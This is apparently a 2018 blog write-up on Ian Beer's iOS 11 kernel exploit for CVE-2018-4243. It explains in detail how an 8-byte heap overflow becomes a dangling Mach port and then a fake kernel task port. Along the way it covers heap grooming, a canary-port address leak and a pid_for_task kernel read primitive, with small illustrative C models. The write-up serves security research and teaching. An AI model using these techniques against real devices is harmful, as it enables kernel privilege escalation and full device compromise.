MustachiOS: Covering Ian Beer's exploit techniques for getvolattrlist bug (iOS 11-11.3.1)

Introduction

CVE-2018-4243 is a kernel heap overflow reported by Ian Beer. Along with a write-up describing the vulnerability, Ian Beer published an exploit for this bug that relies on some awesome exploitation techniques to reach tfp0. In this write-up, we aim to cover those techniques in great detail.

Without further ado, let's dive in!

All credit for the exploitation techniques, the vulnerability, etc. presented here belongs to Ian Beer from Google Project Zero.

PS: This blog post assumes 4k pages.

Oh my VFS!

VFS stands for Virtual File System. It's a file-system abstraction layer whose purpose is to hide file-system-specific operations from the rest of the kernel.
The bug occurs when the kernel needs to handle a call to the fgetattrlist system call, which allows us to retrieve attributes of file-system objects:

int fgetattrlist(int fd, struct attrlist *attrList, void *attrBuf,
                 size_t attrBufSize, unsigned long options);

attrList is an input parameter that specifies which attributes we're interested in.
attrBuf is the output buffer that will contain our object attributes.
attrBufSize is, as its name implies, the size of the attribute buffer. This size is expected to depend on the number of attributes that were specified through the attrList parameter.

The more attributes are specified, the larger the expected attribute buffer. But what if we choose not to follow that expectation? In particular, let's see what happens if we give fgetattrlist an attrBufSize smaller than expected.

When handling the fgetattrlist syscall, the kernel ends up in the getvolattrlist function:

Here, we allocate ab.allocated bytes on the heap, and we make sure that the bufferSize (=attrBufSize) is not larger than needed (l.29), by calculating the minimum between the size expected (fixedsize + varsize), and the size provided as argument (bufferSize).
Now if we continue exploring the function a bit further, we'll eventually stumble upon this:

Interesting! If bufferSize < sizeof(ab.actual) + sizeof(uint32_t), we'll overflow our freshly allocated chunk on the heap by:

sizeof(ab.actual) + sizeof(uint32_t) - bufferSize bytes

For instance, given bufferSize = 0x10, we get an overflow of:

0x14 + 0x4 - 0x10 = 0x8 bytes :)
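The arithmetic above can be checked with a small userland model. This is only a sketch: attribute_set_model_t is our own stand-in for the type of ab.actual (assumed to be five 32-bit attribute group bitmaps, which gives the 0x14 bytes used above), and overflow_bytes is a hypothetical helper, not kernel code.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Stand-in for the type of ab.actual: five 32-bit attribute group bitmaps. */
typedef struct {
    uint32_t commonattr;
    uint32_t volattr;
    uint32_t dirattr;
    uint32_t fileattr;
    uint32_t forkattr;
} attribute_set_model_t;

/* The model must match the 0x14 bytes used in the text. */
static_assert(sizeof(attribute_set_model_t) == 0x14, "unexpected layout");

/* Bytes written at the start of the buffer: a uint32_t plus ab.actual. */
#define HEADER_WRITE_SIZE (sizeof(uint32_t) + sizeof(attribute_set_model_t))

/* Number of bytes written past a buffer of buffer_size bytes (0 if it fits). */
static size_t overflow_bytes(size_t buffer_size)
{
    if (buffer_size >= HEADER_WRITE_SIZE)
        return 0;
    return HEADER_WRITE_SIZE - buffer_size;
}
```

With a 0x10-byte buffer, overflow_bytes(0x10) gives the 8 bytes computed above, and any buffer of at least 0x18 bytes is safe.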

It is worth noting that, in order to reach this code path, the attrList we provide must fulfill the following requirement: (attrList->fileattr || attrList->dirattr || attrList->forkattr) == 0

The last 0x8 bytes of ab.actual are none other than the fileattr and forkattr fields, which mirror the ones we provide through the attrList parameter of fgetattrlist and must therefore be zero. It means that we can overflow the chunk following ab.allocated with 8 NULL bytes.

But, hey, is it really exploitable?

If only we could turn this hard-to-exploit 8-byte overflow into a much more convenient primitive, say a UaF, that'd be great.

Luckily enough, our beloved struct ipc_port seems like the perfect structure to overwrite:

As ipc_object_bits is a typedef for an unsigned int, we see that if our victim buffer overwrites the first 8 bytes of a struct ipc_port with NULL bytes, the port's io_bits and io_references (the port's reference count) are both set to 0. This drops the port's reference count and lets us obtain a dangling port, paving the way to a primitive that is much easier to exploit.

Background

The Zone Allocator will be the subject of another blog post. But let's briefly summarize some of its properties:

Each zone has 4 page lists:

any_free_foreign: for pages that do not belong to zone_map.
all_free: for pages that contain only free objects.
intermediate: for pages that contain both free and allocated objects.
all_used: for pages that contain only allocated objects.

When we want to allocate an object from a zone, the zone's page lists are checked in this specific order:

any_free_foreign → intermediate → all_free

When all page lists are empty for a specific zone, the zone allocator feeds the zone's all_free page list with a certain number of pages (the number of pages allocated is zone specific and depends on zone.alloc_size). Each page added to the zone's all_free page list is consecutive to the previously allocated pages. In other words, when pages are allocated and added to all_free, they are consecutive.

When pages are allocated from zone_map (which contains enough space for us in this exploit (384MB)), they do not contain inline metadata (struct zone_page_metadata) at the beginning of the page.

When a page (or a batch of pages) is added to the all_free page list, the freelist, and thus the order in which objects are allocated from this page, is semi-randomized. This ensures that the allocation order of objects cannot be predicted. For example, this is what a page's freelist looks like right after the page is freshly allocated and put at the tail of the all_free page list:

And as such, this will be the allocation order of objects from this page:

Heap gymnastics

Enough talking, now it's fun time :)

Remember, we want our kalloc.16 allocation from getvolattrlist to overwrite an ipc_port.

Here are the steps toward ~~victory~~ handy dangling mach port:

Filling holes: first, we empty (or almost empty) the intermediate page list by allocating lots of chunks from the kalloc.16 zone to fill the holes. This way, we ensure that all further page allocations from the kalloc.16 zone will be consecutive. We do the same for the ipc port zone.

Spray: Then, the logic is simple: we'll allocate mach ports, and 16-bytes chunks in such a way that pages from kalloc.16 and ipc port zones are criss-crossing. We'll see how.

Overflow: Afterwards, "all that remains" is to free the rightmost object of a kalloc.16 page (the victim page), call our fgetattrlist syscall, and cross our fingers that it allocates the chunk we just freed, so that it overflows into the mach port next to it: the leftmost port of the adjacent ipc port page, to the right of the victim page.

Filling holes

In order to allocate chunks from kalloc.16, we'll use mach messages as our allocation primitive.

More precisely, we'll send complex mach messages with ool port descriptors to a port we allocate specifically for this purpose (and to which we give ourselves a send right, of course).

In fact, when mach messages are sent through the mach_msg syscall, they are handled by mach_msg_send. Here is the call graph (only the relevant parts):

In ipc_kmsg_copyin_body, we'll iterate over each of the MACH_MSG_OOL_PORTS_DESCRIPTORs contained in the message body, and call ipc_kmsg_copyin_ool_ports_descriptor for each descriptor:

And this is where the allocation will occur:

In other words, we control the length of each allocation with the port descriptor's count, and the number of allocations with the message body's msgh_descriptor_count. Nice primitive!

The kernel-side buffer holds one 8-byte port pointer per port name, so by sending mach messages with enough descriptors and a count equal to 0x10 / sizeof(void *), we'll easily fill the holes in the kalloc.16 zone.
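As a rough sketch of how those two knobs translate into numbers, the helpers below compute the descriptor count for a given allocation size and the number of messages needed to fill a given number of holes. Both function names are hypothetical, and the model assumes that the kernel-side buffer stores one 8-byte port pointer per port name.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assumption: 64-bit kernel, one 8-byte port pointer per port name. */
#define KERNEL_PORT_POINTER_SIZE 8u

/* Descriptor count that makes the kernel-side buffer kalloc_size bytes long. */
static uint32_t ool_ports_count_for(size_t kalloc_size)
{
    assert(kalloc_size >= KERNEL_PORT_POINTER_SIZE);
    assert(kalloc_size % KERNEL_PORT_POINTER_SIZE == 0);
    return (uint32_t)(kalloc_size / KERNEL_PORT_POINTER_SIZE);
}

/* Messages needed for `holes` allocations, with descs_per_msg descriptors each. */
static size_t messages_needed(size_t holes, size_t descs_per_msg)
{
    assert(descs_per_msg > 0);
    return (holes + descs_per_msg - 1) / descs_per_msg; /* round up */
}
```

For kalloc.16 this gives a count of 2 per descriptor, and the same helper gives 512 for the page-sized buffers used later in the exploit.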

As for the ipc port zone, filling the holes is as easy as allocating ports with mach_port_allocate.

Spray

Now that we know for sure (thanks to the previous phase) that the ipc port and kalloc.16 zone's page lists are empty (or almost empty), we'll start spraying the heap.
It turns out that, for each "zone refill", 3 pages will be allocated for the ipc port zone, and only one for the kalloc.16 one. That means that, each time the ipc port zone is empty, the zone allocator will allocate 3 consecutive pages and add this set of pages to its all_free page list.
Thus, after each ipc port's "zone refill", the number of new ipc ports that will be available for allocation is:

(PAGE_SIZE * 3) / sizeof(struct ipc_port) = 0x49

Likewise, after each kalloc.16 "zone refill", the number of new objects that will be available for allocation is:

PAGE_SIZE / 0x10 = 0x100
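Both figures can be reproduced with a one-line helper. In this sketch, elements_per_refill is a hypothetical name, and the value 0xa8 for sizeof(struct ipc_port) is our assumption for these iOS versions (the text only gives the resulting 0x49).

```c
#include <assert.h>
#include <stddef.h>

#define PAGE_SIZE_4K      0x1000u
#define IPC_PORT_SIZE     0xa8u   /* assumed sizeof(struct ipc_port) */
#define KALLOC_16_SIZE    0x10u

/* Number of whole objects that fit in one zone refill of `pages` pages. */
static size_t elements_per_refill(size_t pages, size_t elem_size)
{
    assert(elem_size > 0);
    return (pages * PAGE_SIZE_4K) / elem_size;
}
```

elements_per_refill(3, IPC_PORT_SIZE) yields 0x49 ports and elements_per_refill(1, KALLOC_16_SIZE) yields 0x100 chunks, which are the batch sizes used in the spray loop.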

Our heap strategy will be the following:

For a while (we'll allocate a total of 960K):

Allocate 0x49 mach ports
Allocate 0x100 kalloc.16 chunks.

And this will be the approximate layout of the allocations we just made, on the heap:

Actually, we would ideally want to free some kalloc.16 chunks (for example, half of the number we allocated), so that our next kalloc.16 allocations would fall into a page, first in the intermediate page list, and surrounded by ipc port's pages.

After that, we would repeatedly:

Free a random object on this page
Issue a malicious call to fgetattrlist

until the object being freed, then reallocated and abused by fgetattrlist, is the rightmost object on the page.

But if you remember what we said in the Background section, you know that this is what our intermediate kalloc.16 page would look like:

Because of the freelist randomization, innermost objects are always allocated first, and outermost objects are always the last to be allocated.

In our case, this poses quite a big problem: instead of overflowing into an ipc_port, we would overflow into a free kalloc.16 chunk, and guess what, free chunks contain a pointer to the next free element of the freelist in their very first bytes. Overwriting this pointer would result in an instant kernel panic when the corrupted free chunk gets reallocated.

To overcome this annoying hurdle, we need to reverse the freelist order for kalloc.16 chunks.
The freelist works last-in, first-out, so by freeing all the kalloc.16 chunks in the same order we allocated them, we simply reverse the object allocation order: the outermost chunks, freed last, are now allocated first.
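The reversal trick can be illustrated with a toy model in which a page's freelist is a plain LIFO stack. This is a sketch under simplifying assumptions: the page has only 8 chunks, and fl_init_inner_first is a deterministic stand-in for the real semi-random freelist that merely guarantees the "innermost first" property. All names are ours.

```c
#include <assert.h>
#include <stddef.h>

#define NCHUNKS 8

/* A zone page's freelist modeled as a LIFO stack of chunk indices. */
typedef struct {
    int    slots[NCHUNKS];
    size_t count;
} freelist_t;

static void fl_free(freelist_t *fl, int chunk)
{
    assert(fl->count < NCHUNKS);
    fl->slots[fl->count++] = chunk;   /* freed chunk becomes the new head */
}

static int fl_alloc(freelist_t *fl)
{
    assert(fl->count > 0);
    return fl->slots[--fl->count];    /* allocation pops the head */
}

/* Fresh page: outermost chunks are pushed first, so innermost pop first. */
static void fl_init_inner_first(freelist_t *fl)
{
    int lo = 0, hi = NCHUNKS - 1;
    fl->count = 0;
    while (lo < hi) {
        fl_free(fl, hi--);
        fl_free(fl, lo++);
    }
}

/* Allocate everything, free in allocation order, then allocate again. */
static void reverse_allocation_order(freelist_t *fl,
                                     int first[NCHUNKS], int second[NCHUNKS])
{
    for (size_t i = 0; i < NCHUNKS; i++) first[i] = fl_alloc(fl);
    for (size_t i = 0; i < NCHUNKS; i++) fl_free(fl, first[i]);
    for (size_t i = 0; i < NCHUNKS; i++) second[i] = fl_alloc(fl);
}
```

In this model the first pass hands out the innermost chunks first, while the second pass starts with the rightmost and leftmost chunks of the page, which is exactly the property we want before half-filling the page again.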

Here's what we'll actually do:

Step 1: Free all the kalloc.16 chunks, in the same order we allocated them.
Step 2: Reallocate half of the kalloc.16 chunks we just freed in Step 1.

Step 1:

After this step, we'll have free kalloc.16 pages (members of all_free page list), surrounded by ipc port pages:

Step 2:

After Step 2, we'll have a kalloc.16 page, member of the intermediate page list, surrounded by ipc port pages.

This is much better: if we free and reallocate objects from the page illustrated above, taking care never to free/allocate the most freshly allocated ones (because they are more likely to be near free objects), we will eventually free and abuse the rightmost kalloc.16 chunk, and we win.

One important thing to note is that, because we use ool mach port descriptors as our allocation primitive for kalloc.16 chunks, we stay safe when one of them is overflowed with NULL bytes: a NULL pointer is a legitimate value for the port pointers those buffers hold on the heap.

So, as long as we don't overflow a free chunk, we are fine.

Overflow

Now, starting from the 20th kalloc.16 chunk before the last one allocated (last allocated chunk - 20), and moving from last allocated to first allocated, we free a chunk, perform a malicious call to fgetattrlist, and finally check whether the ipc_port adjoining our intermediate page on the right was corrupted. Actually, we don't know which port sits to the right of the intermediate page we're playing with. So, in practice, we check the ipc ports surrounding the intermediate page we're freeing and reallocating from, to see whether one of them was corrupted. If so, we successfully corrupted the leftmost port on the next ipc port page, and that's a big win!

There is an easy way to check whether an ipc_port got its first 8 bytes overwritten with NULL bytes: mach_port_kobject. Calling this function with appropriate parameters on a port whose ip_object.io_bits is set to 0 returns KERN_INVALID_RIGHT. Simply put, calling this function on our corrupted port returns KERN_INVALID_RIGHT instead of the KERN_SUCCESS we would otherwise expect.
This is what the intermediate page we're focused on looks like after our successful overflow:

AARbitrary reads

In our road toward tfp0, we are now looking for a robust arbitrary kernel read primitive. The way to achieve this goal, is to:

Turn our overflow into a UaF
Leverage this UaF to build a fake task port
Read ~~not so~~ arbitrary kernel addresses using pid_for_task on our fake task port.

sudo make_me_a_dangling_port

We said that we wanted to turn our ugly bug into a UaF. This is happening!
It's important that we free the port, but keep the ipc_entry for this port in our space. This can be achieved by calling mach_port_set_attributes on our corrupted port:

Along with that, we also free all the ports we allocated in the Spray phase, except for 3 pages' worth of ports located away from the page where our corrupted port lies.

Canary port

We then choose a port approximately in the middle of the 3 ipc port pages we deliberately refrained from freeing: this will be our canary port.

As we'll soon want to spray the heap, we don't forget to trigger the Garbage Collector, so that free zone pages are given back to the Page Allocator. This is because we want ipc port pages to be reallocated by a different zone, to get interesting type confusion overwrites.

Then, to leak the canary port's address, we spray the heap again, using ool port descriptors as our allocation primitive. We spray page-sized ool descriptor buffers in which the entry at offset 0x90 of the page (the offset of ip_context in a struct ipc_port) is the canary port's name, which the kernel replaces with a pointer to the canary port. Because our dangling port sits at the beginning of a page, this is perfect for us. Hopefully, one of these buffers overwrites the dangling port, which means that the dangling port's ip_context now contains the kernel address of the canary port.

Now, by issuing a call to mach_port_get_context, the canary port's address is ours :)
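To make the layout of that spray buffer concrete, here is a userland sketch of how the array of port names could be laid out. It assumes that each name becomes one 8-byte pointer in the kernel buffer, so kernel offset 0x90 corresponds to array index 0x90 / 8. The type port_name_t and both helpers are stand-ins of our own, not Mach definitions.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PAGE_SIZE_4K        0x1000u
#define KERNEL_POINTER_SIZE 8u      /* assumption: 64-bit kernel pointers */
#define IP_CONTEXT_OFFSET   0x90u   /* offset of ip_context, from the text */
#define NAMES_PER_PAGE      (PAGE_SIZE_4K / KERNEL_POINTER_SIZE)

typedef uint32_t port_name_t;       /* stand-in for mach_port_name_t */

/* Index of the name whose kernel pointer lands at kernel_offset in the page. */
static size_t name_index_for_offset(size_t kernel_offset)
{
    assert(kernel_offset % KERNEL_POINTER_SIZE == 0);
    assert(kernel_offset < PAGE_SIZE_4K);
    return kernel_offset / KERNEL_POINTER_SIZE;
}

/* Fill one page worth of names: all null except the canary slot. */
static void build_canary_names(port_name_t names[NAMES_PER_PAGE],
                               port_name_t canary)
{
    for (size_t i = 0; i < NAMES_PER_PAGE; i++)
        names[i] = 0;               /* 0 stands in for MACH_PORT_NULL */
    names[name_index_for_offset(IP_CONTEXT_OFFSET)] = canary;
}
```

Every other slot stays null so that, wherever the buffer lands, the only non-zero field of the overwritten port is ip_context.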

Pipes considered useful

Overwriting our dangling port with ool port descriptor arrays is great, but it's rather limited: we can only write NULL bytes and mach port addresses. Instead, we want more fine-grained control over the dangling port and its fields. That's where pipes come to the rescue.
Pipes give us total control over their content. We can read from and write to them without having to reallocate for each rewrite. In this exploit, we'll make use of page-sized pipes.

Fake task port

Here, we want our dangling port to become a task port, which points to (through kdata.kobject) a fake task (with fake task->bsd_info).
We'll choose the page that'll contain our fake task to be:

pipe_target_kaddr = PAGE_ALIGN(canary port's address) + 0x10000

In order to overwrite both our dangling port, and the page that'll contain our fake task, we must spray the heap once again. Thus, we'll now iterate over every page we just sprayed in the Canary port section (those in purple). As long as we haven't reached our dangling port, we'll simply leave a page containing an ool port descriptors array there (like it already was). As soon as we reach the dangling port, we spray the heap with a specially crafted 4k (page size) pipe, until both the dangling port and the pipe_target_kaddr page are overwritten with our pipe.
The pipe buffer we're spraying contains a fake task port at the very beginning. This way, we're sure to overwrite our dangling port, which is page-aligned. Moreover, it contains a fake struct task after the fake task port, at offset 0x100, and controlling its bsd_info field allows us to read kernel memory by calling pid_for_task on our fake task port (the dangling port):

This is an approximate view of what the heap looks like after we've finished spraying the new pipe object:

pid_for_task

Each time we call pid_for_task on our fake task port, dangling_port->kdata.kobject->bsd_info->p_pid is returned (see pid_for_task). Since p_pid lies at offset 0x10 in the structure bsd_info points to, setting bsd_info to our target address minus 0x10 makes pid_for_task return the 32-bit value stored at that address.
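The read primitive can be modeled in userland as follows. This is a sketch, not the exploit's code: fake_task_t keeps only the bsd_info field, model_pid_for_task imitates the final dereference that pid_for_task performs, and read32/read64 are hypothetical helper names. The 64-bit variant assumes a little-endian machine.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define P_PID_OFFSET 0x10u  /* offset of p_pid, from the text */

/* Model of the fake task: only the field that matters here. */
typedef struct {
    uintptr_t bsd_info;     /* attacker-controlled "proc" pointer */
} fake_task_t;

/* What pid_for_task boils down to: read 32 bits at bsd_info + 0x10. */
static uint32_t model_pid_for_task(const fake_task_t *task)
{
    uint32_t pid;
    memcpy(&pid, (const void *)(task->bsd_info + P_PID_OFFSET), sizeof(pid));
    return pid;
}

/* 32-bit read primitive: aim bsd_info so that p_pid overlaps addr. */
static uint32_t read32(fake_task_t *task, uintptr_t addr)
{
    assert(addr >= P_PID_OFFSET);
    task->bsd_info = addr - P_PID_OFFSET;
    return model_pid_for_task(task);
}

/* 64-bit read built from two 32-bit reads (little-endian assumed). */
static uint64_t read64(fake_task_t *task, uintptr_t addr)
{
    uint64_t lo = read32(task, addr);
    uint64_t hi = read32(task, addr + sizeof(uint32_t));
    return lo | (hi << 32);
}
```

In the real exploit, updating bsd_info means rewriting the pipe buffer that backs the fake task, and each read costs one pid_for_task call.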

Task for PID 0

Let's do a quick recapitulation:

We now have full control over our dangling port (which is a task port) and its fields.
We have full control over our fake task and its fields.

Now, the ultimate goal is to build a fake kernel task port. In order to build it, we need:

the kernel's vm_map
the kernel's ipc_space

ipc_space

Finding the kernel's ipc_space is quite simple. First we craft a mach message that we send to the canary port:

What is special about this message is that we embed a SEND right to the host port in it, by means of the msgh_local_port field.
Then, we retrieve the host port by reading canary_port->ip_messages.messages.ikmq_base->ikm_header->msgh_local_port through our kernel read primitive.
Once we have the host port, we read its ip_receiver field, which contains the kernel's ipc_space!

vm_map

If you remember, we said previously that the ipc port zone allocates 3 pages for each zone refill.
The beautiful thing here is that the kernel task's port (the original one) lies in the same 3 pages as the host port. And we're lucky enough to have retrieved the host port in the previous section. So we can just scan the 3 pages for the kernel task port, and read kernel_task_port->kdata.kobject->map, which is the vm_map field of the kernel's struct task and corresponds to the kernel's vm_map.

Now, we just bake our freshly found ipc_space and vm_map into our fake task and fake task port. And that's it. We can just profit from our new fake tfp0!

PS: For any remark, correction, or question, please don't hesitate to reach me on twitter @4ldebaran


Acknowledgements:

Ian Beer for his answers to my emails
ghozt for proofreading my article
elvanderb for proofreading my article


Monday, July 30, 2018
